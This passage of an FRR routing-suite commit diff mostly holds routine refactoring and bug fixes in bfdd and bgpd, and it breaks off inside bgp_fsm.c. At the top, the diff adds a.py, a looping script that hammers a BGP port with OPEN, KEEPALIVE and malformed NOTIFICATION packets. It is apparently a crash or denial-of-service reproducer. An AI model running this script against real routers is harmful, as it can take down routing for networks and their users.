-rw-r--r--  a.py | 22
-rw-r--r--  bfdd/bfd.c | 66
-rw-r--r--  bfdd/bfd_packet.c | 47
-rw-r--r--  bgpd/bgp_advertise.c | 24
-rw-r--r--  bgpd/bgp_advertise.h | 15
-rw-r--r--  bgpd/bgp_aspath.c | 22
-rw-r--r--  bgpd/bgp_aspath.h | 1
-rw-r--r--  bgpd/bgp_bmp.c | 20
-rw-r--r--  bgpd/bgp_damp.c | 2
-rw-r--r--  bgpd/bgp_dump.c | 2
-rw-r--r--  bgpd/bgp_evpn.c | 2
-rw-r--r--  bgpd/bgp_evpn_mh.c | 2
-rw-r--r--  bgpd/bgp_filter.c | 4
-rw-r--r--  bgpd/bgp_fsm.c | 145
-rw-r--r--  bgpd/bgp_fsm.h | 5
-rw-r--r--  bgpd/bgp_io.c | 6
-rw-r--r--  bgpd/bgp_keepalives.c | 6
-rw-r--r--  bgpd/bgp_mplsvpn.c | 18
-rw-r--r--  bgpd/bgp_mplsvpn.h | 17
-rw-r--r--  bgpd/bgp_network.c | 4
-rw-r--r--  bgpd/bgp_nexthop.c | 15
-rw-r--r--  bgpd/bgp_nexthop.h | 6
-rw-r--r--  bgpd/bgp_nht.c | 114
-rw-r--r--  bgpd/bgp_packet.c | 19
-rw-r--r--  bgpd/bgp_route.c | 45
-rw-r--r--  bgpd/bgp_updgrp.c | 10
-rw-r--r--  bgpd/bgp_updgrp_adv.c | 175
-rw-r--r--  bgpd/bgp_vty.c | 145
-rw-r--r--  bgpd/bgp_vty.h | 16
-rw-r--r--  bgpd/bgp_zebra.c | 5
-rw-r--r--  bgpd/bgpd.c | 37
-rw-r--r--  bgpd/bgpd.h | 3
-rw-r--r--  bgpd/rfapi/rfapi.c | 11
-rw-r--r--  bgpd/rfapi/rfapi_ap.c | 1
-rw-r--r--  bgpd/rfapi/rfapi_encap_tlv.c | 1
-rw-r--r--  bgpd/rfapi/rfapi_import.c | 65
-rw-r--r--  bgpd/rfapi/rfapi_monitor.c | 52
-rw-r--r--  bgpd/rfapi/rfapi_rib.c | 28
-rw-r--r--  bgpd/rfapi/rfapi_vty.c | 90
-rw-r--r--  bgpd/rfapi/vnc_export_bgp.c | 9
-rw-r--r--  bgpd/rfapi/vnc_export_table.c | 1
-rw-r--r--  bgpd/rfapi/vnc_zebra.c | 2
-rw-r--r--  debian/changelog | 12
-rw-r--r--  doc/developer/locking.rst | 4
-rw-r--r--  doc/developer/rcu.rst | 2
-rw-r--r--  doc/developer/topotests.rst | 6
-rw-r--r--  doc/user/bgp.rst | 8
-rw-r--r--  doc/user/pimv6.rst | 4
-rw-r--r--  isisd/fabricd.c | 14
-rw-r--r--  isisd/isis_adjacency.c | 4
-rw-r--r--  isisd/isis_circuit.c | 24
-rw-r--r--  isisd/isis_cli.c | 4
-rw-r--r--  isisd/isis_dr.c | 10
-rw-r--r--  isisd/isis_dynhn.c | 2
-rw-r--r--  isisd/isis_events.c | 10
-rw-r--r--  isisd/isis_lfa.c | 4
-rw-r--r--  isisd/isis_lsp.c | 8
-rw-r--r--  isisd/isis_pdu.c | 6
-rw-r--r--  isisd/isis_spf.c | 2
-rw-r--r--  isisd/isis_sr.c | 2
-rw-r--r--  isisd/isis_tlvs.c | 8
-rw-r--r--  isisd/isis_tx_queue.c | 6
-rw-r--r--  isisd/isisd.c | 16
-rw-r--r--  ldpd/accept.c | 6
-rw-r--r--  ldpd/adjacency.c | 10
-rw-r--r--  ldpd/control.c | 4
-rw-r--r--  ldpd/interface.c | 9
-rw-r--r--  ldpd/lde.c | 8
-rw-r--r--  ldpd/lde_lib.c | 4
-rw-r--r--  ldpd/ldpd.c | 14
-rw-r--r--  ldpd/ldpe.c | 14
-rw-r--r--  ldpd/neighbor.c | 25
-rw-r--r--  ldpd/packet.c | 6
-rw-r--r--  lib/agentx.c | 5
-rw-r--r--  lib/ferr.c | 10
-rw-r--r--  lib/frr_pthread.c | 14
-rw-r--r--  lib/hash.c | 4
-rw-r--r--  lib/log_filter.c | 10
-rw-r--r--  lib/northbound_grpc.cpp | 2
-rw-r--r--  lib/privs.c | 4
-rw-r--r--  lib/stream.c | 8
-rw-r--r--  lib/thread.c | 49
-rw-r--r--  lib/zlog_targets.c | 16
-rw-r--r--  ospf6d/ospf6_gr_helper.c | 2
-rw-r--r--  ospfclient/ospf_apiclient.c | 6
-rw-r--r--  ospfd/ospf_apiserver.c | 8
-rw-r--r--  ospfd/ospf_gr.c | 2
-rw-r--r--  ospfd/ospf_interface.c | 8
-rw-r--r--  ospfd/ospf_ism.c | 22
-rw-r--r--  ospfd/ospf_ism.h | 3
-rw-r--r--  ospfd/ospf_lsa.c | 10
-rw-r--r--  ospfd/ospf_neighbor.c | 12
-rw-r--r--  ospfd/ospf_nsm.c | 26
-rw-r--r--  ospfd/ospf_nsm.h | 3
-rw-r--r--  ospfd/ospf_opaque.c | 10
-rw-r--r--  ospfd/ospf_packet.c | 4
-rw-r--r--  ospfd/ospf_vty.c | 2
-rw-r--r--  ospfd/ospfd.c | 52
-rw-r--r--  ospfd/ospfd.h | 2
-rw-r--r--  pathd/path_zebra.c | 6
-rw-r--r--  pathd/path_zebra.h | 1
-rw-r--r--  pathd/pathd.c | 2
-rw-r--r--  pimd/mtracebis_netlink.c | 21
-rw-r--r--  pimd/pim6_cmd.c | 20
-rw-r--r--  pimd/pim_cmd.c | 20
-rw-r--r--  pimd/pim_cmd_common.c | 10
-rw-r--r--  pimd/pim_cmd_common.h | 1
-rw-r--r--  pimd/pim_iface.c | 25
-rw-r--r--  pimd/pim_nht.c | 2
-rw-r--r--  redhat/frr.spec.in | 123
-rw-r--r--  ripd/rip_interface.c | 2
-rw-r--r--  ripd/rip_nb_rpcs.c | 4
-rw-r--r--  ripd/rip_peer.c | 4
-rw-r--r--  ripd/ripd.c | 46
-rw-r--r--  ripd/ripd.h | 3
-rw-r--r--  ripngd/ripng_interface.c | 2
-rw-r--r--  ripngd/ripng_nb_rpcs.c | 4
-rw-r--r--  ripngd/ripng_peer.c | 4
-rw-r--r--  ripngd/ripngd.c | 42
-rw-r--r--  ripngd/ripngd.h | 2
-rw-r--r--  tests/topotests/bfd_vrflite_topo1/__init__.py | 0
-rw-r--r--  tests/topotests/bfd_vrflite_topo1/r1/bfd_peers_status.json | 96
-rw-r--r--  tests/topotests/bfd_vrflite_topo1/r1/bfdd.conf | 26
-rw-r--r--  tests/topotests/bfd_vrflite_topo1/r1/zebra.conf | 24
-rw-r--r--  tests/topotests/bfd_vrflite_topo1/r2/bfdd.conf | 26
-rw-r--r--  tests/topotests/bfd_vrflite_topo1/r2/zebra.conf | 24
-rw-r--r--  tests/topotests/bfd_vrflite_topo1/test_bfd_vrflite_topo1.py | 153
-rw-r--r--  tests/topotests/bgp_as_override/__init__.py | 0
-rw-r--r--  tests/topotests/bgp_as_override/r1/bgpd.conf | 10
-rw-r--r--  tests/topotests/bgp_as_override/r1/zebra.conf | 9
-rw-r--r--  tests/topotests/bgp_as_override/r2/bgpd.conf | 10
-rw-r--r--  tests/topotests/bgp_as_override/r2/zebra.conf | 9
-rw-r--r--  tests/topotests/bgp_as_override/r3/bgpd.conf | 13
-rw-r--r--  tests/topotests/bgp_as_override/r3/zebra.conf | 9
-rw-r--r--  tests/topotests/bgp_as_override/r4/bgpd.conf | 7
-rw-r--r--  tests/topotests/bgp_as_override/r4/zebra.conf | 6
-rw-r--r--  tests/topotests/bgp_as_override/test_bgp_as_override.py | 122
-rw-r--r--  tests/topotests/bgp_default_originate/bgp_default_originate_2links.json | 136
-rw-r--r--  tests/topotests/bgp_default_originate/test_bgp_default_originate_2links.py | 1414
-rw-r--r--  tests/topotests/bgp_default_originate/test_bgp_default_originate_topo1_1.py | 2
-rw-r--r--  tests/topotests/bgp_default_originate/test_bgp_default_originate_topo1_2.py | 2
-rw-r--r--  tests/topotests/bgp_default_originate/test_bgp_default_originate_topo1_3.py | 3
-rw-r--r--  tests/topotests/bgp_default_originate/test_default_orginate_vrf.py | 2
-rw-r--r--  tests/topotests/bgp_default_originate/test_default_originate_conditional_routemap.py | 2
-rw-r--r--  tests/topotests/bgp_default_route_route_map_match/r1/zebra.conf | 2
-rw-r--r--  tests/topotests/bgp_ipv4_over_ipv6/test_rfc5549_ebgp_ibgp_nbr.py | 3
-rw-r--r--  tests/topotests/bgp_ipv4_over_ipv6/test_rfc5549_ebgp_nbr.py | 2
-rw-r--r--  tests/topotests/bgp_ipv4_over_ipv6/test_rfc5549_ebgp_unnumbered_nbr.py | 2
-rw-r--r--  tests/topotests/bgp_ipv4_over_ipv6/test_rfc5549_ibgp_nbr.py | 3
-rw-r--r--  tests/topotests/bgp_ipv4_over_ipv6/test_rfc5549_ibgp_unnumbered_nbr.py | 1
-rwxr-xr-x  tests/topotests/bgp_snmp_mplsl3vpn/test_bgp_snmp_mplsvpn.py | 13
-rw-r--r--  tests/topotests/bgp_vpnv4_noretain/__init__.py | 0
-rw-r--r--  tests/topotests/bgp_vpnv4_noretain/r1/bgpd.conf | 24
-rw-r--r--  tests/topotests/bgp_vpnv4_noretain/r1/ipv4_vpn_routes.json | 69
-rw-r--r--  tests/topotests/bgp_vpnv4_noretain/r1/ipv4_vpn_routes_unfiltered.json | 94
-rw-r--r--  tests/topotests/bgp_vpnv4_noretain/r1/isisd.conf | 14
-rw-r--r--  tests/topotests/bgp_vpnv4_noretain/r1/zebra.conf | 13
-rw-r--r--  tests/topotests/bgp_vpnv4_noretain/r2/bgpd.conf | 35
-rw-r--r--  tests/topotests/bgp_vpnv4_noretain/r2/isisd.conf | 14
-rw-r--r--  tests/topotests/bgp_vpnv4_noretain/r2/zebra.conf | 16
-rw-r--r--  tests/topotests/bgp_vpnv4_noretain/test_bgp_vpnv4_noretain.py | 201
-rw-r--r--  tests/topotests/lib/common_config.py | 90
-rw-r--r--  tests/topotests/lib/micronet.py | 54
-rw-r--r--  tests/topotests/lib/pim.py | 439
-rw-r--r--  tests/topotests/lib/topogen.py | 6
-rw-r--r--  tests/topotests/lib/topojson.py | 11
-rw-r--r--  tests/topotests/lib/topotest.py | 1
-rw-r--r--  tests/topotests/multicast_pim_static_rp_topo1/multicast_pimv6_static_rp.json | 197
-rwxr-xr-x  tests/topotests/multicast_pim_static_rp_topo1/test_multicast_pimv6_static_rp.py | 414
-rw-r--r--  tests/topotests/ospf_gr_helper/test_ospf_gr_helper1.py | 2
-rw-r--r--  tests/topotests/ospf_gr_helper/test_ospf_gr_helper2.py | 2
-rw-r--r--  tests/topotests/ospf_gr_helper/test_ospf_gr_helper3.py | 2
-rw-r--r--  tests/topotests/ospfv3_basic_functionality/test_ospfv3_asbr_summary_topo1.py | 1
-rw-r--r--  tools/gcc-plugins/frr-format.c | 2
-rw-r--r--  tools/gcc-plugins/gcc-common.h | 5
-rw-r--r--  vrrpd/vrrp.c | 6
-rw-r--r--  vtysh/vtysh.c | 68
-rw-r--r--  zebra/irdp_main.c | 4
-rw-r--r--  zebra/kernel_netlink.c | 2
-rw-r--r--  zebra/rt_netlink.c | 8
-rw-r--r--  zebra/rtadv.c | 14
-rw-r--r--  zebra/zebra_dplane.c | 4
-rw-r--r--  zebra/zebra_evpn_mac.c | 5
-rw-r--r--  zebra/zebra_fpm.c | 10
-rw-r--r--  zebra/zebra_mpls.c | 38
-rw-r--r--  zebra/zebra_netns_notify.c | 2
-rw-r--r--  zebra/zebra_opaque.c | 4
-rw-r--r--  zebra/zebra_ptm.c | 8
-rw-r--r--  zebra/zebra_pw.c | 4
-rw-r--r--  zebra/zebra_rib.c | 4
-rw-r--r--  zebra/zserv.c | 22
191 files changed, 5133 insertions(+), 1081 deletions(-)
diff --git a/a.py b/a.py
new file mode 100644
index 0000000000..5b0fb679ff
--- /dev/null
+++ b/a.py
@@ -0,0 +1,22 @@
+import socket
+from time import sleep
+
+bgp_open = b'\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\x00#\x01\x04\x00\x02\x00\x05\xac\x11\x00\x01\xff\xff\x00\x03\x00\x01\x00'
+bgp_keepalive = b'\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\x00\x13\x04'
+bgp_notification = b'\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\x00\x15\x04xv'
+
+while True:
+ try:
+ print("[+] Creating socket...")
+ s = socket.socket(type=socket.SOCK_STREAM)
+ print("[+] Connecting to server...")
+ s.connect(('172.17.0.3', 179))
+ s.send(bgp_open)
+ sleep(0.0009999999)
+ s.send(bgp_keepalive)
+ s.send(bgp_notification)
+ except KeyboardInterrupt:
+ s.close()
+ break
+ except:
+ s.close()
diff --git a/bfdd/bfd.c b/bfdd/bfd.c
index 483beb1b17..a161926358 100644
--- a/bfdd/bfd.c
+++ b/bfdd/bfd.c
@@ -1950,40 +1950,38 @@ static int bfd_vrf_enable(struct vrf *vrf)
if (bglobal.debug_zebra)
zlog_debug("VRF enable add %s id %u", vrf->name, vrf->vrf_id);
- if (vrf->vrf_id == VRF_DEFAULT ||
- vrf_get_backend() == VRF_BACKEND_NETNS) {
- if (!bvrf->bg_shop)
- bvrf->bg_shop = bp_udp_shop(vrf);
- if (!bvrf->bg_mhop)
- bvrf->bg_mhop = bp_udp_mhop(vrf);
- if (!bvrf->bg_shop6)
- bvrf->bg_shop6 = bp_udp6_shop(vrf);
- if (!bvrf->bg_mhop6)
- bvrf->bg_mhop6 = bp_udp6_mhop(vrf);
- if (!bvrf->bg_echo)
- bvrf->bg_echo = bp_echo_socket(vrf);
- if (!bvrf->bg_echov6)
- bvrf->bg_echov6 = bp_echov6_socket(vrf);
-
- if (!bvrf->bg_ev[0] && bvrf->bg_shop != -1)
- thread_add_read(master, bfd_recv_cb, bvrf,
- bvrf->bg_shop, &bvrf->bg_ev[0]);
- if (!bvrf->bg_ev[1] && bvrf->bg_mhop != -1)
- thread_add_read(master, bfd_recv_cb, bvrf,
- bvrf->bg_mhop, &bvrf->bg_ev[1]);
- if (!bvrf->bg_ev[2] && bvrf->bg_shop6 != -1)
- thread_add_read(master, bfd_recv_cb, bvrf,
- bvrf->bg_shop6, &bvrf->bg_ev[2]);
- if (!bvrf->bg_ev[3] && bvrf->bg_mhop6 != -1)
- thread_add_read(master, bfd_recv_cb, bvrf,
- bvrf->bg_mhop6, &bvrf->bg_ev[3]);
- if (!bvrf->bg_ev[4] && bvrf->bg_echo != -1)
- thread_add_read(master, bfd_recv_cb, bvrf,
- bvrf->bg_echo, &bvrf->bg_ev[4]);
- if (!bvrf->bg_ev[5] && bvrf->bg_echov6 != -1)
- thread_add_read(master, bfd_recv_cb, bvrf,
- bvrf->bg_echov6, &bvrf->bg_ev[5]);
- }
+ if (!bvrf->bg_shop)
+ bvrf->bg_shop = bp_udp_shop(vrf);
+ if (!bvrf->bg_mhop)
+ bvrf->bg_mhop = bp_udp_mhop(vrf);
+ if (!bvrf->bg_shop6)
+ bvrf->bg_shop6 = bp_udp6_shop(vrf);
+ if (!bvrf->bg_mhop6)
+ bvrf->bg_mhop6 = bp_udp6_mhop(vrf);
+ if (!bvrf->bg_echo)
+ bvrf->bg_echo = bp_echo_socket(vrf);
+ if (!bvrf->bg_echov6)
+ bvrf->bg_echov6 = bp_echov6_socket(vrf);
+
+ if (!bvrf->bg_ev[0] && bvrf->bg_shop != -1)
+ thread_add_read(master, bfd_recv_cb, bvrf, bvrf->bg_shop,
+ &bvrf->bg_ev[0]);
+ if (!bvrf->bg_ev[1] && bvrf->bg_mhop != -1)
+ thread_add_read(master, bfd_recv_cb, bvrf, bvrf->bg_mhop,
+ &bvrf->bg_ev[1]);
+ if (!bvrf->bg_ev[2] && bvrf->bg_shop6 != -1)
+ thread_add_read(master, bfd_recv_cb, bvrf, bvrf->bg_shop6,
+ &bvrf->bg_ev[2]);
+ if (!bvrf->bg_ev[3] && bvrf->bg_mhop6 != -1)
+ thread_add_read(master, bfd_recv_cb, bvrf, bvrf->bg_mhop6,
+ &bvrf->bg_ev[3]);
+ if (!bvrf->bg_ev[4] && bvrf->bg_echo != -1)
+ thread_add_read(master, bfd_recv_cb, bvrf, bvrf->bg_echo,
+ &bvrf->bg_ev[4]);
+ if (!bvrf->bg_ev[5] && bvrf->bg_echov6 != -1)
+ thread_add_read(master, bfd_recv_cb, bvrf, bvrf->bg_echov6,
+ &bvrf->bg_ev[5]);
+
if (vrf->vrf_id != VRF_DEFAULT) {
bfdd_zclient_register(vrf->vrf_id);
bfdd_sessions_enable_vrf(vrf);
diff --git a/bfdd/bfd_packet.c b/bfdd/bfd_packet.c
index d34d642762..82b3f09b0c 100644
--- a/bfdd/bfd_packet.c
+++ b/bfdd/bfd_packet.c
@@ -876,6 +876,14 @@ void bfd_recv_cb(struct thread *t)
"no session found");
return;
}
+ /*
+ * We may have a situation where received packet is on wrong vrf
+ */
+ if (bfd && bfd->vrf && bfd->vrf != bvrf->vrf) {
+ cp_debug(is_mhop, &peer, &local, ifindex, vrfid,
+ "wrong vrfid.");
+ return;
+ }
/* Ensure that existing good sessions are not overridden. */
if (!cp->discrs.remote_discr && bfd->ses_state != PTM_BFD_DOWN &&
@@ -1208,10 +1216,41 @@ int bp_set_tos(int sd, uint8_t value)
return 0;
}
+static bool bp_set_reuse_addr(int sd)
+{
+ int one = 1;
+
+ if (setsockopt(sd, SOL_SOCKET, SO_REUSEADDR, &one, sizeof(one)) == -1) {
+ zlog_warn("set-reuse-addr: setsockopt(SO_REUSEADDR, %d): %s",
+ one, strerror(errno));
+ return false;
+ }
+ return true;
+}
+
+static bool bp_set_reuse_port(int sd)
+{
+ int one = 1;
+
+ if (setsockopt(sd, SOL_SOCKET, SO_REUSEPORT, &one, sizeof(one)) == -1) {
+ zlog_warn("set-reuse-port: setsockopt(SO_REUSEPORT, %d): %s",
+ one, strerror(errno));
+ return false;
+ }
+ return true;
+}
+
+
static void bp_set_ipopts(int sd)
{
int rcvttl = BFD_RCV_TTL_VAL;
+ if (!bp_set_reuse_addr(sd))
+ zlog_fatal("set-reuse-addr: failed");
+
+ if (!bp_set_reuse_port(sd))
+ zlog_fatal("set-reuse-port: failed");
+
if (bp_set_ttl(sd, BFD_TTL_VAL) != 0)
zlog_fatal("set-ipopts: TTL configuration failed");
@@ -1453,6 +1492,12 @@ static void bp_set_ipv6opts(int sd)
int ipv6_pktinfo = BFD_IPV6_PKT_INFO_VAL;
int ipv6_only = BFD_IPV6_ONLY_VAL;
+ if (!bp_set_reuse_addr(sd))
+ zlog_fatal("set-reuse-addr: failed");
+
+ if (!bp_set_reuse_port(sd))
+ zlog_fatal("set-reuse-port: failed");
+
if (bp_set_ttlv6(sd, BFD_TTL_VAL) == -1)
zlog_fatal(
"set-ipv6opts: setsockopt(IPV6_UNICAST_HOPS, %d): %s",
@@ -1573,7 +1618,7 @@ int bp_echo_socket(const struct vrf *vrf)
return -1;
}
-
+ memset(&sll, 0, sizeof(sll));
sll.sll_family = AF_PACKET;
sll.sll_protocol = htons(ETH_P_IP);
sll.sll_ifindex = 0;
diff --git a/bgpd/bgp_advertise.c b/bgpd/bgp_advertise.c
index 34776bd6db..cfbb29df1c 100644
--- a/bgpd/bgp_advertise.c
+++ b/bgpd/bgp_advertise.c
@@ -43,35 +43,35 @@
/* BGP advertise attribute is used for pack same attribute update into
one packet. To do that we maintain attribute hash in struct
peer. */
-struct bgp_advertise_attr *baa_new(void)
+struct bgp_advertise_attr *bgp_advertise_attr_new(void)
{
return XCALLOC(MTYPE_BGP_ADVERTISE_ATTR,
sizeof(struct bgp_advertise_attr));
}
-static void baa_free(struct bgp_advertise_attr *baa)
+void bgp_advertise_attr_free(struct bgp_advertise_attr *baa)
{
XFREE(MTYPE_BGP_ADVERTISE_ATTR, baa);
}
-static void *baa_hash_alloc(void *p)
+static void *bgp_advertise_attr_hash_alloc(void *p)
{
struct bgp_advertise_attr *ref = (struct bgp_advertise_attr *)p;
struct bgp_advertise_attr *baa;
- baa = baa_new();
+ baa = bgp_advertise_attr_new();
baa->attr = ref->attr;
return baa;
}
-unsigned int baa_hash_key(const void *p)
+unsigned int bgp_advertise_attr_hash_key(const void *p)
{
const struct bgp_advertise_attr *baa = p;
return attrhash_key_make(baa->attr);
}
-bool baa_hash_cmp(const void *p1, const void *p2)
+bool bgp_advertise_attr_hash_cmp(const void *p1, const void *p2)
{
const struct bgp_advertise_attr *baa1 = p1;
const struct bgp_advertise_attr *baa2 = p2;
@@ -115,20 +115,22 @@ void bgp_advertise_delete(struct bgp_advertise_attr *baa,
baa->adv = adv->next;
}
-struct bgp_advertise_attr *bgp_advertise_intern(struct hash *hash,
- struct attr *attr)
+struct bgp_advertise_attr *bgp_advertise_attr_intern(struct hash *hash,
+ struct attr *attr)
{
struct bgp_advertise_attr ref;
struct bgp_advertise_attr *baa;
ref.attr = bgp_attr_intern(attr);
- baa = (struct bgp_advertise_attr *)hash_get(hash, &ref, baa_hash_alloc);
+ baa = (struct bgp_advertise_attr *)hash_get(
+ hash, &ref, bgp_advertise_attr_hash_alloc);
baa->refcnt++;
return baa;
}
-void bgp_advertise_unintern(struct hash *hash, struct bgp_advertise_attr *baa)
+void bgp_advertise_attr_unintern(struct hash *hash,
+ struct bgp_advertise_attr *baa)
{
if (baa->refcnt)
baa->refcnt--;
@@ -140,7 +142,7 @@ void bgp_advertise_unintern(struct hash *hash, struct bgp_advertise_attr *baa)
hash_release(hash, baa);
bgp_attr_unintern(&baa->attr);
}
- baa_free(baa);
+ bgp_advertise_attr_free(baa);
}
}
diff --git a/bgpd/bgp_advertise.h b/bgpd/bgp_advertise.h
index 4b032ba9c6..70294c2d89 100644
--- a/bgpd/bgp_advertise.h
+++ b/bgpd/bgp_advertise.h
@@ -152,18 +152,19 @@ extern void bgp_adj_in_remove(struct bgp_dest *dest, struct bgp_adj_in *bai);
extern void bgp_sync_init(struct peer *peer);
extern void bgp_sync_delete(struct peer *peer);
-extern unsigned int baa_hash_key(const void *p);
-extern bool baa_hash_cmp(const void *p1, const void *p2);
+extern unsigned int bgp_advertise_attr_hash_key(const void *p);
+extern bool bgp_advertise_attr_hash_cmp(const void *p1, const void *p2);
extern void bgp_advertise_add(struct bgp_advertise_attr *baa,
struct bgp_advertise *adv);
extern struct bgp_advertise *bgp_advertise_new(void);
extern void bgp_advertise_free(struct bgp_advertise *adv);
-extern struct bgp_advertise_attr *bgp_advertise_intern(struct hash *hash,
- struct attr *attr);
-extern struct bgp_advertise_attr *baa_new(void);
+extern struct bgp_advertise_attr *bgp_advertise_attr_intern(struct hash *hash,
+ struct attr *attr);
+extern struct bgp_advertise_attr *bgp_advertise_attr_new(void);
extern void bgp_advertise_delete(struct bgp_advertise_attr *baa,
struct bgp_advertise *adv);
-extern void bgp_advertise_unintern(struct hash *hash,
- struct bgp_advertise_attr *baa);
+extern void bgp_advertise_attr_unintern(struct hash *hash,
+ struct bgp_advertise_attr *baa);
+extern void bgp_advertise_attr_free(struct bgp_advertise_attr *baa);
#endif /* _QUAGGA_BGP_ADVERTISE_H */
diff --git a/bgpd/bgp_aspath.c b/bgpd/bgp_aspath.c
index 39886337f3..06f6073781 100644
--- a/bgpd/bgp_aspath.c
+++ b/bgpd/bgp_aspath.c
@@ -1209,28 +1209,6 @@ bool aspath_private_as_check(struct aspath *aspath)
return true;
}
-/* Return True if the entire ASPATH consist of the specified ASN */
-bool aspath_single_asn_check(struct aspath *aspath, as_t asn)
-{
- struct assegment *seg;
-
- if (!(aspath && aspath->segments))
- return false;
-
- seg = aspath->segments;
-
- while (seg) {
- int i;
-
- for (i = 0; i < seg->length; i++) {
- if (seg->as[i] != asn)
- return false;
- }
- seg = seg->next;
- }
- return true;
-}
-
/* Replace all instances of the target ASN with our own ASN */
struct aspath *aspath_replace_specific_asn(struct aspath *aspath,
as_t target_asn, as_t our_asn)
diff --git a/bgpd/bgp_aspath.h b/bgpd/bgp_aspath.h
index 5caab73c4d..0b58e1adc4 100644
--- a/bgpd/bgp_aspath.h
+++ b/bgpd/bgp_aspath.h
@@ -112,7 +112,6 @@ extern unsigned int aspath_get_first_as(struct aspath *aspath);
extern unsigned int aspath_get_last_as(struct aspath *aspath);
extern int aspath_loop_check(struct aspath *aspath, as_t asno);
extern bool aspath_private_as_check(struct aspath *aspath);
-extern bool aspath_single_asn_check(struct aspath *aspath, as_t asn);
extern struct aspath *aspath_replace_specific_asn(struct aspath *aspath,
as_t target_asn,
as_t our_asn);
diff --git a/bgpd/bgp_bmp.c b/bgpd/bgp_bmp.c
index 2b6e1c8ad3..bcab4099c0 100644
--- a/bgpd/bgp_bmp.c
+++ b/bgpd/bgp_bmp.c
@@ -992,7 +992,7 @@ afibreak:
}
struct bgp_table *table = bmp->targets->bgp->rib[afi][safi];
- struct bgp_dest *bn;
+ struct bgp_dest *bn = NULL;
struct bgp_path_info *bpi = NULL, *bpiter;
struct bgp_adj_in *adjin = NULL, *adjiter;
@@ -1120,6 +1120,9 @@ afibreak:
bmp_monitor(bmp, adjin->peer, 0, bn_p, prd, adjin->attr, afi,
safi, adjin->uptime);
+ if (bn)
+ bgp_dest_unlock_node(bn);
+
return true;
}
@@ -1145,7 +1148,7 @@ static bool bmp_wrqueue(struct bmp *bmp, struct pullwr *pullwr)
{
struct bmp_queue_entry *bqe;
struct peer *peer;
- struct bgp_dest *bn;
+ struct bgp_dest *bn = NULL;
bool written = false;
bqe = bmp_pull(bmp);
@@ -1222,6 +1225,10 @@ static bool bmp_wrqueue(struct bmp *bmp, struct pullwr *pullwr)
out:
if (!bqe->refcount)
XFREE(MTYPE_BMP_QUEUE, bqe);
+
+ if (bn)
+ bgp_dest_unlock_node(bn);
+
return written;
}
@@ -2217,8 +2224,13 @@ DEFPY(bmp_monitor_cfg,
NO_STR
BMP_STR
"Send BMP route monitoring messages\n"
- "Address Family\nAddress Family\nAddress Family\n"
- "Address Family\nAddress Family\nAddress Family\nAddress Family\n"
+ BGP_AF_STR
+ BGP_AF_STR
+ BGP_AF_STR
+ BGP_AF_STR
+ BGP_AF_STR
+ BGP_AF_STR
+ BGP_AF_STR
"Send state before policy and filter processing\n"
"Send state with policy and filters applied\n")
{
diff --git a/bgpd/bgp_damp.c b/bgpd/bgp_damp.c
index 62e8e71aa0..9acbaf7733 100644
--- a/bgpd/bgp_damp.c
+++ b/bgpd/bgp_damp.c
@@ -465,7 +465,7 @@ int bgp_damp_disable(struct bgp *bgp, afi_t afi, safi_t safi)
return 0;
/* Cancel reuse event. */
- thread_cancel(&(bdc->t_reuse));
+ THREAD_OFF(bdc->t_reuse);
/* Clean BGP dampening information. */
bgp_damp_info_clean(afi, safi);
diff --git a/bgpd/bgp_dump.c b/bgpd/bgp_dump.c
index e57f449f78..720925b20f 100644
--- a/bgpd/bgp_dump.c
+++ b/bgpd/bgp_dump.c
@@ -702,7 +702,7 @@ static int bgp_dump_unset(struct bgp_dump *bgp_dump)
}
/* Removing interval event. */
- thread_cancel(&bgp_dump->t_interval);
+ THREAD_OFF(bgp_dump->t_interval);
bgp_dump->interval = 0;
diff --git a/bgpd/bgp_evpn.c b/bgpd/bgp_evpn.c
index bbbe538acc..395111e1d2 100644
--- a/bgpd/bgp_evpn.c
+++ b/bgpd/bgp_evpn.c
@@ -6428,7 +6428,7 @@ static void bgp_evpn_remote_ip_process_nexthops(struct bgpevpn *vpn,
return;
tree = &vpn->bgp_vrf->nexthop_cache_table[afi];
- bnc = bnc_find(tree, &p, 0);
+ bnc = bnc_find(tree, &p, 0, 0);
if (!bnc || !bnc->is_evpn_gwip_nexthop)
return;
diff --git a/bgpd/bgp_evpn_mh.c b/bgpd/bgp_evpn_mh.c
index b42296f4de..3f801f7ea0 100644
--- a/bgpd/bgp_evpn_mh.c
+++ b/bgpd/bgp_evpn_mh.c
@@ -4952,7 +4952,7 @@ void bgp_evpn_mh_finish(void)
bgp_evpn_es_local_info_clear(es, true);
}
if (bgp_mh_info->t_cons_check)
- thread_cancel(&bgp_mh_info->t_cons_check);
+ THREAD_OFF(bgp_mh_info->t_cons_check);
list_delete(&bgp_mh_info->local_es_list);
list_delete(&bgp_mh_info->pend_es_list);
list_delete(&bgp_mh_info->ead_es_export_rtl);
diff --git a/bgpd/bgp_filter.c b/bgpd/bgp_filter.c
index fc9fc1e523..8921622953 100644
--- a/bgpd/bgp_filter.c
+++ b/bgpd/bgp_filter.c
@@ -189,7 +189,7 @@ static void as_list_filter_add(struct as_list *aslist,
replace = bgp_aslist_seq_check(aslist, asfilter->seq);
if (replace) {
as_filter_entry_replace(aslist, replace, asfilter);
- return;
+ goto hook;
}
/* Check insert point. */
@@ -218,6 +218,7 @@ static void as_list_filter_add(struct as_list *aslist,
aslist->tail = asfilter;
}
+hook:
/* Run hook function. */
if (as_list_master.add_hook)
(*as_list_master.add_hook)(aslist->name);
@@ -484,6 +485,7 @@ DEFUN(as_path, bgp_as_path_cmd,
if (!config_bgp_aspath_validate(regstr)) {
vty_out(vty, "Invalid character in as-path access-list %s\n",
regstr);
+ XFREE(MTYPE_TMP, regstr);
return CMD_WARNING_CONFIG_FAILED;
}
diff --git a/bgpd/bgp_fsm.c b/bgpd/bgp_fsm.c
index b034437a18..b570c84d8b 100644
--- a/bgpd/bgp_fsm.c
+++ b/bgpd/bgp_fsm.c
@@ -177,24 +177,24 @@ static struct peer *peer_xfer_conn(struct peer *from_peer)
*/
bgp_keepalives_off(from_peer);
- BGP_TIMER_OFF(peer->t_routeadv);
- BGP_TIMER_OFF(peer->t_connect);
- BGP_TIMER_OFF(peer->t_delayopen);
- BGP_TIMER_OFF(peer->t_connect_check_r);
- BGP_TIMER_OFF(peer->t_connect_check_w);
- BGP_TIMER_OFF(from_peer->t_routeadv);
- BGP_TIMER_OFF(from_peer->t_connect);
